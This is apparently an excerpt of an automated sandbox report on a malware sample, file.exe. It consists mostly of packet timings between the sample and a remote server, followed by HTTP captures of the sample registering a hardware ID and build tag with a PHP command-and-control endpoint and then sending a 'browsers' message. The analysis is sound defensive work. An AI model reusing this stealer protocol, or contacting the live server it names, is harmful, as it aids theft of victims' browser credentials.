Oct 14, 2024 01:53:23.264420033 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.264453888 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.264487028 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.264499903 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.264519930 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.264532089 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.264553070 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.264569998 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.264585972 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.264597893 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.264619112 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.264625072 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.264652014 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.264663935 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.264686108 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.264699936 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.264718056 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.264750957 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.264763117 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.264786005 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.264792919 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.264820099 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.264832973 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.264847994 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.264863968 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.264879942 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.264888048 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.264913082 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.264940977 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.264955997 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.264974117 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.264988899 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265012026 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265086889 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265120029 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265135050 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265152931 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265167952 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265185118 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265213013 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265222073 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265224934 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265254974 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265268087 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265290022 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265321970 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265342951 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265355110 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265387058 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265389919 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265400887 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265422106 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265450954 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265455008 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265475988 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265487909 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265497923 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265520096 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265532017 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265552998 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265564919 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265588045 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265610933 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265620947 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265641928 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265654087 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265666962 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265687943 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265700102 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265719891 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265732050 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265753984 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265784979 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265799046 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265816927 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265824080 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265850067 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265862942 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265882969 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265892982 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265914917 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265928030 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265948057 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265960932 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.265984058 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.265993118 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.266030073 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.310008049 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.310239077 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.345992088 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.350775957 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.577694893 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.577745914 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.577758074 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.577761889 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.577778101 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.577800989 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.577814102 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.577814102 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.577816010 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.577831030 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.577856064 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.577861071 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.577861071 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.577872038 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.577888012 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.577910900 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.577910900 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.577924013 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.577939034 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.577954054 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.577960014 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.577960014 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.577960014 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.577996969 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578046083 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578061104 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578075886 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578089952 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578103065 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578107119 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578119040 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578135014 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578151941 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578183889 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578361034 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578376055 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578389883 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578403950 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578408957 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578418970 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578439951 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578440905 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578458071 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578466892 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578473091 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578479052 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578488111 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578501940 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578510046 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578516006 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578520060 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578531981 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578541040 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578547001 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578552961 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578562021 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578581095 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578584909 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578600883 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578605890 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578615904 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578632116 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578633070 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578646898 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578661919 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578665018 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578675985 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578689098 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578691006 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578706026 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578710079 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578722954 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578733921 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578737974 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578753948 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578762054 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578768015 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578778028 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578783035 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578798056 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578802109 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578813076 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578814030 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578828096 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578850985 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578851938 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578867912 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578881979 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578882933 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578896999 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578908920 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578912020 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578923941 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578927040 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578942060 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578955889 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578958988 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578969955 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.578969955 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578985929 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.578999043 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.579008102 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.579008102 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.579015017 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.579024076 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.579054117 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.579292059 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.579308987 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.579322100 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.579334974 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.579338074 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.579349995 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.579349995 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.579366922 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:23.579372883 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.579402924 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:23.579421997 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:24.182046890 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:24.182075024 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:24.186920881 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:24.187030077 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:25.081681967 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:25.081830978 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:25.135976076 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:25.140836000 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:25.367477894 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:25.367562056 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:25.367588043 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:25.367613077 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:25.458698988 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:25.458784103 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:25.458847046 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:25.458901882 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:25.462289095 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:25.467227936 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:25.693541050 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:25.693614006 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:25.711106062 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:25.716854095 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.435044050 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.435132027 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:26.437618017 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:26.442492008 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.674138069 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.674180984 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.674218893 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:26.674280882 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:26.674854040 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.674947977 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.674978971 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.675010920 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.675024986 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:26.675024986 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:26.675064087 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:26.675558090 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.675592899 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.675627947 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.675690889 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:26.676162958 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.676217079 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.676273108 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:26.676753044 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.676786900 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.676819086 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.676851034 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:26.677908897 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:26.765367031 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:26.765470982 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:26.766781092 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:26.771936893 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:27.492866039 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:27.492939949 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:30.426465988 CEST	49705	80	192.168.2.5	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	185.215.113.37	80	7112	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:53:11.086157084 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Oct 14, 2024 01:53:11.812107086 CEST	203	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:11 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 14, 2024 01:53:11.845838070 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJD Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 32 45 32 39 45 30 46 37 34 46 34 30 33 33 30 36 30 30 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 2d 2d 0d 0a Data Ascii: ------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="hwid"A02E29E0F74F4033060071------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="build"doma------KJDAECAEBKJJJKEBKKJD--
Oct 14, 2024 01:53:12.105304956 CEST	407	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 23:53:11 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4f 57 46 6c 4f 57 5a 6c 59 7a 45 33 4d 7a 67 35 59 54 4d 30 4d 6a 4d 32 59 57 51 32 4d 57 55 32 4e 6a 45 32 4e 6a 45 7a 59 54 59 7a 4e 32 55 33 59 6a 41 31 4d 32 46 6c 4d 54 63 31 5a 57 52 6c 4e 6d 4e 6d 4d 6d 45 77 5a 47 59 79 5a 57 5a 6c 5a 6d 51 78 4e 44 56 69 4e 47 49 32 5a 6d 45 32 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: OWFlOWZlYzE3Mzg5YTM0MjM2YWQ2MWU2NjE2NjEzYTYzN2U3YjA1M2FlMTc1ZWRlNmNmMmEwZGYyZWZlZmQxNDViNGI2ZmE2fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Oct 14, 2024 01:53:12.135370016 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFB Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 65 39 66 65 63 31 37 33 38 39 61 33 34 32 33 36 61 64 36 31 65 36 36 31 36 36 31 33 61 36 33 37 65 37 62 30 35 33 61 65 31 37 35 65 64 65 36 63 66 32 61 30 64 66 32 65 66 65 66 64 31 34 35 62 34 62 36 66 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 2d 2d 0d 0a Data Ascii: ------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="token"9ae9fec17389a34236ad61e6616613a637e7b053ae175ede6cf2a0df2efefd145b4b6fa6------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="message"browsers------KFCFBFHIEBKJKFHIEBFB--
